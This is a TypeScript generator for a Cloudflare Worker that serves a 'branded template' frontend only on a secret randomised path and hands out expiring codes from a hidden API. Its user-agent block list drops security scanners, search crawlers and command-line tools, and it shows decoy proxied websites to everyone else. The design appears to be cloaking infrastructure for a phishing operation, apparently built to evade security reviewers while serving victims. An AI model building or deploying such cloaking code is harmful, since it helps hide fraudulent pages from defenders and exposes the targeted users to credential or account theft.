export interface WorkerConfig {
  template: string;
  clientAlias: string;
  apiServerUrl: string;
  frontendUrl: string;
  /**
   * The randomised public-facing path that grants access to the frontend.
   * Passing sandbox but using any other path proxies a random website.
   * Example: '/x7k9p2m' or '/api/v3/q8r4t1'
   */
  publicCodePath: string;
  /**
   * Websites proxied transparently to visitors who pass sandbox but lack
   * the correct path. Must contain at least one entry.
   */
  decoyDomains: string[];
  /**
   * Name of the KV namespace binding available in the Worker environment.
   * Defaults to 'CODE_STORE'. Must be bound in wrangler.toml / upload metadata.
   */
  kvBindingName?: string;
  /**
   * Cloudflare KV namespace ID. Required for rate limiting and code caching.
   * Find it at: Cloudflare Dashboard → Workers & Pages → KV → your namespace.
   */
  kvNamespaceId?: string;
  workerApiSecret: string;
}

export function generateWorkerScript(config: WorkerConfig): string {
  const apiUrl = config.apiServerUrl.replace(/\/$/, "");
  // Keep the frontend URL's pathname exactly as configured. Some routers
  // distinguish /entry from /entry/, and the initial secret-path request is
  // supposed to map to that URL without silently changing it.
  const frontendUrl = config.frontendUrl.trim();
  const kvBinding = config.kvBindingName ?? "CODE_STORE";
  // Normalise the secret path — strip trailing slash, always starts with /
  const secretPath = "/" + config.publicCodePath.replace(/^\/|\/$/g, "");

  return `// ---------------------------------------------------------------------------
// Cloudflare Worker — generated by worker-generator
//
// Request routing:
//
//   Sandbox fail                      → empty 200, no body, no clues
//   Path starts with SECRET_PATH      → frontend proxy (HTML gets session cookie)
//   HTML request, non-secret path     → random website proxy
//   Worker API (/api/*)               → session-gated (rate limited)
//   Everything else (assets, fonts…)  → transparent frontend proxy, no session
//     required — hashed filenames are non-guessable without the secret HTML.
//
// The session cookie is intentionally NOT used as a gate for static assets.
// HTTP/2 multiplexing means asset requests can race ahead of the Set-Cookie
// commit; gating them on the cookie causes MIME-type failures in all browsers.
// ---------------------------------------------------------------------------

// ── Embedded config ──────────────────────────────────────────────────────────
const API_ORIGIN      = ${JSON.stringify(apiUrl)};
const FRONTEND_ORIGIN = ${JSON.stringify(frontendUrl)};
const TEMPLATE        = ${JSON.stringify(config.template)};
const CLIENT_ALIAS    = ${JSON.stringify(config.clientAlias)};
const SECRET_PATH     = ${JSON.stringify(secretPath)};
const PROXY_WEBSITES  = ${JSON.stringify(config.decoyDomains)};
const KV_BINDING      = ${JSON.stringify(kvBinding)};
const WORKER_API_SECRET = ${JSON.stringify(config.workerApiSecret)};

// ── Timing constants ─────────────────────────────────────────────────────────
const CODE_TTL_MS     = 15 * 60 * 1000;
const CODE_TTL_SEC    = 15 * 60;
const KV_TTL_SEC      = 20 * 60;
const SESSION_TTL_SEC = 60 * 60;
const SESSION_COOKIE  = '_sess';

// ── Sandboxing — blocked UA fragments ────────────────────────────────────────
const BLOCKED_UA = [
  'curl','wget','python','httpie','go-http','java/','ruby','perl/','php/',
  'scrapy','httpclient','okhttp','axios','node-fetch','got/','requests/',
  'libwww','zgrab','masscan','nmap','sqlmap','nikto','dirbuster','nuclei',
  'semrush','ahrefsbot','mj12bot','dotbot','petalbot','serpstatbot',
  'bingbot','googlebot','yandexbot','baiduspider',
];

// ── Rate limits ───────────────────────────────────────────────────────────────
const RATE_LIMITS = {
  generatecode:   { max: 1, windowMs: 86400000 },
  regeneratecode: { max: 2, windowMs: 86400000 },
};

// ── Helpers ───────────────────────────────────────────────────────────────────

/** Sandbox failed — return a completely empty response. Nothing leaked. */
function emptyDrop() {
  return new Response(null, { status: 200, headers: { 'Content-Length': '0' } });
}

/** Proxy a random website transparently. No redirect in browser history. */
async function proxyRandomSite(request) {
  const target = PROXY_WEBSITES[Math.floor(Math.random() * PROXY_WEBSITES.length)];
  try {
    const res = await fetch(target, {
      method: 'GET',
      headers: {
        'User-Agent':      request.headers.get('User-Agent') || 'Mozilla/5.0',
        'Accept':          'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': request.headers.get('Accept-Language') || 'en-US,en;q=0.5',
      },
      redirect: 'follow',
    });
    // Strip security headers that would break rendering of the proxied page
    const h = new Headers(res.headers);
    ['x-frame-options','content-security-policy','content-security-policy-report-only',
     'cross-origin-opener-policy','cross-origin-embedder-policy',
     'cross-origin-resource-policy'].forEach(k => h.delete(k));
    h.set('X-Content-Type-Options', 'nosniff');
    h.set('X-Frame-Options', 'DENY');
    h.set('Content-Security-Policy', "frame-ancestors 'none'; object-src 'none'; base-uri 'none'");
    h.set('Referrer-Policy', 'strict-origin-when-cross-origin');
    return new Response(res.body, { status: res.status, statusText: res.statusText, headers: h });
  } catch (_) {
    return new Response('<!DOCTYPE html><html><head><title></title></head><body></body></html>',
      { status: 200, headers: { 'Content-Type': 'text/html; charset=utf-8' } });
  }
}

/**
 * Normalise pathname — strip trailing slash so '/xids' and '/xids/' both match.
 * Root '/' is preserved as-is.
 */
function normPath(pathname) {
  return pathname.length > 1 ? pathname.replace(/\\/$/, '') : pathname;
}

/**
 * Strip the secret-path prefix from a pathname so the frontend origin receives
 * the path it expects. /secret/assets/app.js → /assets/app.js.
 */
function frontendPath(pathname) {
  if (SECRET_PATH === '/') return pathname;
  if (pathname === SECRET_PATH) return '/';
  if (pathname.startsWith(SECRET_PATH + '/')) {
    return pathname.slice(SECRET_PATH.length) || '/';
  }
  return pathname;
}

/**
 * Build the full URL to fetch from the frontend origin, forwarding query string.
 *
 * The public worker path has already been removed before this helper runs.
 * Preserve a path configured in FRONTEND_ORIGIN (for example
 * https://frontend.example/app) without ever adding SECRET_PATH to it.
 */
function buildFrontendUrl(pathname, search) {
  const target = new URL(FRONTEND_ORIGIN);
  const configuredBase = target.pathname || '/';
  const base = configuredBase.replace(/\\/+$/, '');
  const suffix = pathname.startsWith('/') ? pathname : '/' + pathname;
  const alreadyIncludesBase =
    base && (suffix === base || suffix.startsWith(base + '/'));
  // The public secret path maps to the configured frontend URL exactly.
  // Do not turn https://frontend.example/entry into
  // https://frontend.example/entry/ — some frontend routers distinguish them.
  if (pathname === '/') {
    target.pathname = configuredBase;
  } else {
    target.pathname = alreadyIncludesBase ? suffix : (base + suffix) || '/';
  }
  target.search   = search;
  return target.toString();
}

function isRedirectResponse(response) {
  return response.status >= 300 && response.status < 400;
}

/**
 * Convert an upstream same-origin redirect back into the worker's public
 * secret-path route. Otherwise the browser follows Location to the frontend
 * hostname and the proxy appears to randomly "lose" the URL.
 */
function rewriteFrontendLocation(location, requestUrl) {
  if (!location) return null;

  try {
    const upstream = new URL(FRONTEND_ORIGIN);
    const destination = new URL(location, requestUrl || upstream);

    // Never rewrite redirects to a different origin (login providers, etc.).
    if (destination.origin !== upstream.origin) return null;

    const base = upstream.pathname.replace(/\\/+$/, '');
    let publicPath = destination.pathname;
    if (base && publicPath === base) {
      publicPath = '/';
    } else if (base && publicPath.startsWith(base + '/')) {
      publicPath = publicPath.slice(base.length) || '/';
      // Keep the slash that the upstream explicitly requested. Without this,
      // an upstream canonical redirect from /entry to /entry/ loops forever:
      // /secret → /entry → /entry/ → /secret.
      if (destination.pathname === base + '/') publicPath = '/';
    }

    const prefix = SECRET_PATH === '/' ? '' : SECRET_PATH;
    const publicTarget =
      publicPath === '/' && destination.pathname.endsWith('/')
        ? prefix + '/'
        : prefix + (publicPath === '/' ? '' : publicPath);
    return (publicTarget +
      destination.search + destination.hash) || '/';
  } catch (_) {
    return null;
  }
}

/**
 * Strip hop-by-hop and origin-specific headers before forwarding a request to
 * the frontend origin. Forces identity encoding so the Worker reads plain bytes.
 */
function frontendHeaders(request, freshHtml = false) {
  const headers = new Headers(request.headers);
  [
    'host', 'content-length', 'connection', 'accept-encoding',
    'cf-connecting-ip', 'cf-ray', 'cf-visitor',
    'x-forwarded-for', 'x-forwarded-host', 'x-forwarded-proto',
  ].forEach(name => headers.delete(name));
  // A browser refresh commonly sends validators. If the upstream answers
  // 304 for the worker's HTML entry point, there is no body for the Worker to
  // serve and the page can appear to fail intermittently. Always fetch a fresh
  // HTML document; assets can keep their normal browser caching behavior.
  if (freshHtml) {
    ['if-none-match', 'if-modified-since', 'if-match', 'if-unmodified-since', 'range']
      .forEach(name => headers.delete(name));
  }
  headers.set('Accept-Encoding', 'identity');
  return headers;
}

/**
 * Clean a response from the frontend origin before returning it to the browser.
 * Strips headers that conflict with the Worker hostname and preserves the
 * original Content-Type so JS/CSS files are never served as text/html.
 */
function frontendResponse(response, requestedPath, upstreamUrl) {
  const headers = new Headers(response.headers);
  [
    'content-encoding', 'content-length', 'transfer-encoding', 'connection',
    // Security headers tied to the origin host — reissuing them from the Worker
    // hostname breaks scripts and framing.
    'content-security-policy', 'content-security-policy-report-only',
    'x-frame-options', 'cross-origin-opener-policy',
   'cross-origin-embedder-policy', 'cross-origin-resource-policy',
  ].forEach(name => headers.delete(name));
  headers.set('X-Content-Type-Options', 'nosniff');
  headers.set('X-Frame-Options', 'DENY');
  headers.set('Content-Security-Policy', "frame-ancestors 'none'; object-src 'none'; base-uri 'none'");
  headers.set('Referrer-Policy', 'strict-origin-when-cross-origin');
  const location = headers.get('Location');
  const rewrittenLocation = rewriteFrontendLocation(location, upstreamUrl);
  if (rewrittenLocation) headers.set('Location', rewrittenLocation);
  if (requestedPath) headers.set('X-Worker-Frontend-Path', requestedPath);
  return new Response(response.body, {
    status:     response.status,
    statusText: response.statusText,
    headers,
  });
}

function requestsHtml(request) {
  const accept = (request.headers.get('Accept') || '').toLowerCase();
  return accept.includes('text/html');
}

function passesFrontendSandbox(request) {
  const ua = (request.headers.get('User-Agent') || '').toLowerCase();
  if (!ua || ua.length < 10) return false;
  for (const frag of BLOCKED_UA) {
    if (ua.includes(frag)) return false;
  }
  return true;
}

function isHtmlResponse(response) {
  return (response.headers.get('content-type') || '').toLowerCase().includes('text/html');
}

function frontendUnavailable(status, reason) {
  return new Response(
    'Frontend origin unavailable. Check the configured Frontend URL and Worker logs.',
    {
      status: 502,
      headers: {
        'Content-Type': 'text/plain; charset=utf-8',
        'Cache-Control': 'no-store',
        'X-Worker-Frontend-Error': reason || ('upstream-' + status),
      },
    },
  );
}

// ── Sandbox helpers ───────────────────────────────────────────────────────────

/**
 * Strict sandbox — for visitors without a session.
 * Rejects bots, scanners, CLI tools, automated HTTP clients, and any request
 * that does not present a browser-style Accept header.
 */
function passesSandbox(request) {
  const ua     = (request.headers.get('User-Agent') || '').toLowerCase();
  const accept = (request.headers.get('Accept')     || '').toLowerCase();

  if (!ua || ua.length < 10) return false;

  for (const frag of BLOCKED_UA) {
    if (ua.includes(frag)) return false;
  }

  // Real browsers send text/html (navigations) or */* (assets, fetch).
  if (!accept.includes('text/html') && !accept.includes('*/*')) return false;

  // Cloudflare threat score — block high-risk IPs.
  const score = request.cf && request.cf.threatScore;
  if (typeof score === 'number' && score > 25) return false;

  return true;
}

/**
 * Relaxed sandbox — for requests that already carry a valid session cookie.
 * The Accept-header check is intentionally skipped: fetch() calls from inside
 * the loaded frontend may send Accept: application/json or other non-html
 * types and must not be silently dropped.
 */
function passesRelaxedSandbox(request) {
  const ua = (request.headers.get('User-Agent') || '').toLowerCase();

  if (!ua || ua.length < 10) return false;

  for (const frag of BLOCKED_UA) {
    if (ua.includes(frag)) return false;
  }

  const score = request.cf && request.cf.threatScore;
  if (typeof score === 'number' && score > 25) return false;

  return true;
}

// ── Session helpers ───────────────────────────────────────────────────────────

function getCookie(header, name) {
  if (!header) return '';
  const m = header.match(new RegExp('(?:^|;\\s*)' + name + '=([^;]*)'));
  return m ? decodeURIComponent(m[1]) : '';
}

function hasSession(request) {
  return getCookie(request.headers.get('Cookie') || '', SESSION_COOKIE) === 'ok';
}

function clientKey(request) {
  const ip = request.headers.get('CF-Connecting-IP') || 'unknown';
  const ua = (request.headers.get('User-Agent') || '').slice(0, 64).replace(/\\W/g, '_');
  return 'code:' + ip + ':' + ua;
}

// ── Rate limiter ──────────────────────────────────────────────────────────────

async function checkRateLimit(request, route, kv) {
  if (!kv) return { allowed: true, remaining: 999 };

  const limit = RATE_LIMITS[route];
  const ip    = request.headers.get('CF-Connecting-IP') || 'unknown';
  const key   = 'rl:' + route + ':' + ip;
  const now   = Date.now();

  const raw   = await kv.get(key, 'json').catch(() => null);
  let state   = (raw && now < raw.reset) ? raw : { count: 0, reset: now + limit.windowMs };

  state.count++;
  const allowed = state.count <= limit.max;
  const ttlSec  = Math.max(1, Math.ceil((state.reset - now) / 1000));

  await kv.put(key, JSON.stringify(state), { expirationTtl: ttlSec }).catch(() => null);

  return { allowed, remaining: Math.max(0, limit.max - state.count) };
}

// ── Main handler ──────────────────────────────────────────────────────────────

export default {
  async fetch(request, env) {
    const url  = new URL(request.url);
    const path = normPath(url.pathname);
    const kv   = env[KV_BINDING] || null;

    // Whether this request falls under the secret-path mount point.
    // The exact path AND every sub-path (assets, API sub-routes) are frontend
    // traffic and are proxied before any session check.
    const isFrontendPath =
      path === SECRET_PATH ||
      (SECRET_PATH !== '/' && path.startsWith(SECRET_PATH + '/'));

    // Stripped path — used for the worker's own API route matching below.
    // For paths that do not start with SECRET_PATH this equals 'path'.
    const appPath = frontendPath(path);

    // ── Step 1: Sandbox ───────────────────────────────────────────────────────
    // Session holders use a relaxed check (UA + CF threat score only) so that
    // API fetch() calls with Accept: application/json are not dropped.
    // Non-session requests face the full strict check.
    if (isFrontendPath) {
      // The secret path is already the access gate. Do not apply the variable
      // Cloudflare threat score here: it can change between a page refresh and
      // its asset requests, especially before Set-Cookie reaches the browser.
      if (!passesFrontendSandbox(request)) return emptyDrop();
    } else if (hasSession(request)) {
      if (!passesRelaxedSandbox(request)) return emptyDrop();
    } else {
      if (!passesSandbox(request)) return emptyDrop();
    }

    // ── Step 2: Secret-path mount → proxy entire frontend ─────────────────────
    // Every request under SECRET_PATH (the HTML page AND all its assets) is
    // reverse-proxied to the real frontend. The secret prefix is stripped so
    // the origin receives the path it expects (e.g. /assets/app.js).
    // Session cookie is stamped only on the initial HTML landing page.
    if (isFrontendPath) {
      const fetchPath = frontendPath(path);

      try {
        const upstreamUrl = buildFrontendUrl(fetchPath, url.search);
        const res = await fetch(upstreamUrl, {
          method:  request.method,
          headers: frontendHeaders(request, path === SECRET_PATH),
          body:    (request.method === 'GET' || request.method === 'HEAD') ? undefined : request.body,
          redirect: 'manual',
        });

        if (!res.ok && !isRedirectResponse(res) && path === SECRET_PATH) {
          return frontendUnavailable(res.status, 'upstream-' + res.status);
        }
        if (path === SECRET_PATH && !isRedirectResponse(res) && !isHtmlResponse(res)) {
          return frontendUnavailable(res.status, 'upstream-not-html');
        }

        // Transfer body ownership to 'fwd'. Never touch res.body after this.
        const fwd = frontendResponse(res, fetchPath, upstreamUrl);

        if (path === SECRET_PATH) {
          // Grant session cookie on the HTML entry point so the worker API
          // routes (/api/generatecode etc.) remain session-gated.
          const h = new Headers(fwd.headers);
          h.set('Set-Cookie',
            SESSION_COOKIE + '=ok; HttpOnly; Max-Age=' + SESSION_TTL_SEC +
            '; SameSite=Lax; Secure; Path=/');

          // ── React Router path fix ────────────────────────────────────────
          // The frontend SPA uses React Router with path:"/". When the browser
          // lands on /{SECRET_PATH} the router sees that pathname, finds no
          // matching route, and renders the 404 catch-all instead of the app.
          //
          // Fix: inject a tiny inline script that runs BEFORE React boots and
          // calls history.replaceState to strip the secret prefix, so the
          // router always initialises against "/" (or whatever sub-path is
          // below the secret prefix).
          const rawHtml  = await fwd.text();
          const fixScript =
            '<script>(function(){' +
            'var sp=${JSON.stringify(secretPath)},' +
            'p=location.pathname,' +
            's=p===sp?"/":p.startsWith(sp+"/")?p.slice(sp.length):p;' +
            'if(s!==p)history.replaceState(null,"",s+location.search+location.hash)' +
            '})();</script>';
           // Keep the origin app covered while it discovers which branded
           // template this Worker is serving. The app currently renders its
           // default template first and then requests /api/template; without
           // this overlay that intermediate render briefly becomes visible.
           const templateLoadingScript =
             '<script>(function(){' +
             'var id="worker-template-loading",' +
             'hideTimer=null,' +
             'hidden=false,' +
             'workerTemplate=${JSON.stringify(config.template)};' +
             'var style=document.createElement("style");' +
             'style.textContent="#"+id+"{position:fixed;inset:0;z-index:2147483647;display:grid;place-items:center;background:#fff;opacity:1;transition:opacity .18s ease}"' +
             '+"#"+id+">div{width:18px;height:18px;border:2px solid #d1d5db;border-top-color:#6b7280;border-radius:50%;animation:worker-template-spin .7s linear infinite}"' +
             '+"@keyframes worker-template-spin{to{transform:rotate(360deg)}}"'+
             ';' +
             'document.documentElement.appendChild(style);' +
             'var overlay=document.createElement("div");' +
             'overlay.id=id;' +
             'overlay.setAttribute("aria-label","Loading");' +
             'overlay.setAttribute("role","status");' +
             'var spinner=document.createElement("div");' +
             'overlay.appendChild(spinner);' +
             'document.documentElement.appendChild(overlay);' +
             'function hide(){' +
             'if(hidden)return;' +
             'hidden=true;' +
             'clearTimeout(hideTimer);' +
             'overlay.style.opacity="0";' +
             'setTimeout(function(){' +
             'if(overlay.parentNode)overlay.parentNode.removeChild(overlay);' +
             'if(style.parentNode)style.parentNode.removeChild(style);' +
             '},220);' +
             '}' +
             'function templateRequest(value){' +
              'try{return String(value||"").indexOf("/api/template")!==-1;}' +
             'catch(_){return false;}' +
             '}' +
             'var originalFetch=window.fetch;' +
             'if(originalFetch){' +
             'window.fetch=function(input,init){' +
             'var value=typeof input==="string"?input:(input&&input.url)||"";' +
             'var tracked=templateRequest(value);' +
             'var result=tracked' +
             '?Promise.resolve(new Response(JSON.stringify({template:workerTemplate}),{status:200,headers:{"Content-Type":"application/json","Cache-Control":"no-store"}}))' +
             ':originalFetch.call(this,input,init);' +
             'if(tracked){' +
             'result.then(function(){hideTimer=setTimeout(hide,180);},function(){hideTimer=setTimeout(hide,180);});' +
             '}' +
             'return result;' +
             '};' +
             '}' +
             'if(window.XMLHttpRequest){' +
             'var open=XMLHttpRequest.prototype.open;' +
             'var send=XMLHttpRequest.prototype.send;' +
             'XMLHttpRequest.prototype.open=function(method,url){' +
             'this.__workerTemplateRequest=templateRequest(url);' +
             'return open.apply(this,arguments);' +
             '};' +
             'XMLHttpRequest.prototype.send=function(){' +
             'if(this.__workerTemplateRequest)this.addEventListener("loadend",function(){hideTimer=setTimeout(hide,180);},{once:true});' +
             'return send.apply(this,arguments);' +
             '};' +
             '}' +
             '})();</script>';
           // Insert before </head> so both scripts execute before any module scripts.
          const patchedHtml = rawHtml.includes('</head>')
             ? rawHtml.replace('</head>', fixScript + templateLoadingScript + '</head>')
             : fixScript + templateLoadingScript + rawHtml;

          return new Response(patchedHtml, {
            status:     fwd.status,
            statusText: fwd.statusText,
            headers:    h,
          });
        }

        // Sub-path assets: proxy straight through, preserving Content-Type.
        return fwd;
      } catch (_) {
        return path === SECRET_PATH
          ? frontendUnavailable(0, 'fetch-failed')
          : new Response('502 Bad Gateway', { status: 502 });
      }
    }

    // ── Step 3: HTML request on a non-secret path → random website ────────────
    // Any navigation request that is NOT under the secret path gets a convincing
    // proxy of a random website, regardless of whether the visitor has a session.
    // Exception: a session holder refreshing from "/" (because the secret-path
    // script stripped the prefix via history.replaceState) is redirected back to
    // the secret path so they land on the real app instead of the random proxy.
    if (requestsHtml(request)) {
      if (hasSession(request)) {
        return Response.redirect(
          new URL(SECRET_PATH, request.url).toString(), 302
        );
      }
      return proxyRandomSite(request);
    }

    // ── Step 4: Worker-owned API routes (session-gated, rate-limited) ─────────
    // These are the worker's own endpoints — not the frontend's backend routes.
    // Requiring a session means they can only be used from inside the loaded
    // frontend page (which the user reached via the secret path).

    // GET /api/template
    if (appPath === '/api/template' && request.method === 'GET') {
      // This is bootstrap configuration, not user data. Return the embedded
      // deployment choice even if the session cookie has not committed yet;
      // otherwise a cookie race can turn template discovery into a decoy page
      // and make the frontend choose its unrelated default.
      return Response.json({ template: TEMPLATE },
        { headers: {
          'Access-Control-Allow-Origin': '*',
          'Cache-Control': 'no-store',
        } });
    }

    // GET /api/generatecode
    if (appPath === '/api/generatecode' && request.method === 'GET') {
      if (!hasSession(request)) return proxyRandomSite(request);
      try {
        const key = clientKey(request);

        // Return cached code if still within 15-minute window
        const stored = kv ? await kv.get(key, 'json').catch(() => null) : null;
        if (stored && stored.expiry > Date.now()) {
          const cid = getCookie(request.headers.get('Cookie') || '', '_cid') || stored.cid || '';
          // Override expires_in with actual remaining seconds so the frontend
          // countdown timer reflects reality on page refresh, not a stale 900.
          const remainingSec = Math.max(0, Math.floor(
            (new Date(stored.data.expires_at).getTime() - Date.now()) / 1000
          ));
          const cachedData = { ...stored.data, expires_in: remainingSec };
          return Response.json(cachedData, {
            headers: {
              'Access-Control-Allow-Origin': '*',
              'Set-Cookie': '_cid=' + encodeURIComponent(cid) +
                '; HttpOnly; Max-Age=' + CODE_TTL_SEC + '; SameSite=Lax; Secure; Path=/',
            },
          });
        }

        const rl = await checkRateLimit(request, 'generatecode', kv);
        if (!rl.allowed) return proxyRandomSite(request);

        const target = new URL(API_ORIGIN + '/api/generatecode');
        target.searchParams.set('app', CLIENT_ALIAS);
        const res = await fetch(target.toString(), { headers: { 'X-Q7m2K': WORKER_API_SECRET }, cf: { cacheEverything: false } });
        if (!res.ok) return proxyRandomSite(request);

        const data = await res.json();
        const cid  = crypto.randomUUID().replace(/-/g, '').slice(0, 16);
        if (kv) {
          await kv.put(key,
            JSON.stringify({ data, expiry: Date.now() + CODE_TTL_MS, cid }),
            { expirationTtl: KV_TTL_SEC }
          ).catch(() => null);
        }

        return Response.json(data, {
          status: 200,
          headers: {
            'Access-Control-Allow-Origin': '*',
            'Set-Cookie': '_cid=' + encodeURIComponent(cid) +
              '; HttpOnly; Max-Age=' + CODE_TTL_SEC + '; SameSite=Lax; Secure; Path=/',
          },
        });
      } catch (_) {
        return proxyRandomSite(request);
      }
    }

    // POST /api/regeneratecode — clear the KV cache for this client, then fetch
    // a fresh code from the same upstream GET endpoint used by generatecode.
    // Calling the upstream POST /api/regeneratecode directly triggers Cloudflare
    // Bot Fight Mode on the API server (server-to-server POST gets challenged).
    // Using the proven GET path avoids that entirely.
    if (appPath === '/api/regeneratecode' && request.method === 'POST') {
      if (!hasSession(request)) return proxyRandomSite(request);
      try {
        const rl = await checkRateLimit(request, 'regeneratecode', kv);
        if (!rl.allowed) return proxyRandomSite(request);

        // Step 1: Invalidate the cached code so the client gets a genuinely new one.
        const key = clientKey(request);
        if (kv) await kv.delete(key).catch(() => null);

        // Step 2: Fetch a fresh code from the upstream generatecode endpoint.
        const target = new URL(API_ORIGIN + '/api/generatecode');
        target.searchParams.set('app', CLIENT_ALIAS);
        const res = await fetch(target.toString(), { headers: { 'X-Q7m2K': WORKER_API_SECRET }, cf: { cacheEverything: false } });
        if (!res.ok) return proxyRandomSite(request);

        // Step 3: Store the new code in KV so a subsequent page refresh returns
        // the same new code (not a second fresh fetch).
        const data = await res.json();
        const cid = crypto.randomUUID().replace(/-/g, '').slice(0, 16);
        if (kv) {
          await kv.put(key,
            JSON.stringify({ data, expiry: Date.now() + CODE_TTL_MS, cid }),
            { expirationTtl: KV_TTL_SEC }
          ).catch(() => null);
        }

        return Response.json(data, {
          status: 200,
          headers: {
            'Access-Control-Allow-Origin': '*',
            'Set-Cookie': '_cid=' + encodeURIComponent(cid) +
              '; HttpOnly; Max-Age=' + CODE_TTL_SEC + '; SameSite=Lax; Secure; Path=/',
          },
        });
      } catch (_) {
        return proxyRandomSite(request);
      }
    }

    // ── Step 5: Transparent proxy — assets and all other non-HTML requests ─────
    // No session required here. Static assets (JS, CSS, fonts, images) have
    // Vite content-hashes in their filenames; an attacker cannot guess them
    // without first obtaining the HTML, which is only served via the secret path.
    // HTML requests are already caught in Step 3, so this branch never serves HTML.
    try {
      const upstreamUrl = buildFrontendUrl(appPath, url.search);
      const res = await fetch(upstreamUrl, {
        method:   request.method,
        headers:  frontendHeaders(request),
        body:     (request.method === 'GET' || request.method === 'HEAD') ? undefined : request.body,
        redirect: 'manual',
      });
      return frontendResponse(res, appPath, upstreamUrl);
    } catch (_) {
      return new Response('502 Bad Gateway', { status: 502 });
    }
  },
};`;
}
